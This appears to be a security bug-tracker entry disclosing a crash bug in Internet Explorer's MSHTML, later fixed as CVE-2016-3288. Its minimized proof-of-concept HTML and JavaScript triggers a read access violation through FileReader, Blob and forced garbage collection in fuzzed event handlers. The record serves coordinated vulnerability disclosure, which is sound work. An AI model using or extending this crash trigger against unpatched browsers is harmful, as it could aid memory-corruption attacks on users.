New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Aug 2016
Cc:



Sign in to add a comment
Microsoft Internet Explorer: Read AV in MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal
Project Member Reported by mbarbella@google.com, May 17 2016 Back to list
Still working on a minimized PoC, but attached the unminimized one for the time being. It's a bit flaky, so it's proving to be a little tough.

Looks like bug filing from CF was broken with the transition to Monorail (I can fix that soon), but in the meantime the report is https://cluster-fuzz.appspot.com/testcase?key=5178133082275840

 
fuzz-125.html
1.5 MB View Download
Project Member Comment 1 by mbarbella@google.com, May 20 2016
Here's the (improve but not perfect) minimized test case. Sent it to MS today:

<script>
function eventhandler1() {
  CollectGarbage();
}

function eventhandler5() {
  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>

</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">
Project Member Comment 2 by mbarbella@google.com, Aug 11 2016
Labels: -Restrict-View-Commit CVE-2016-3288 Fixed-2016-August-09
Status: Fixed
Sign in to add a comment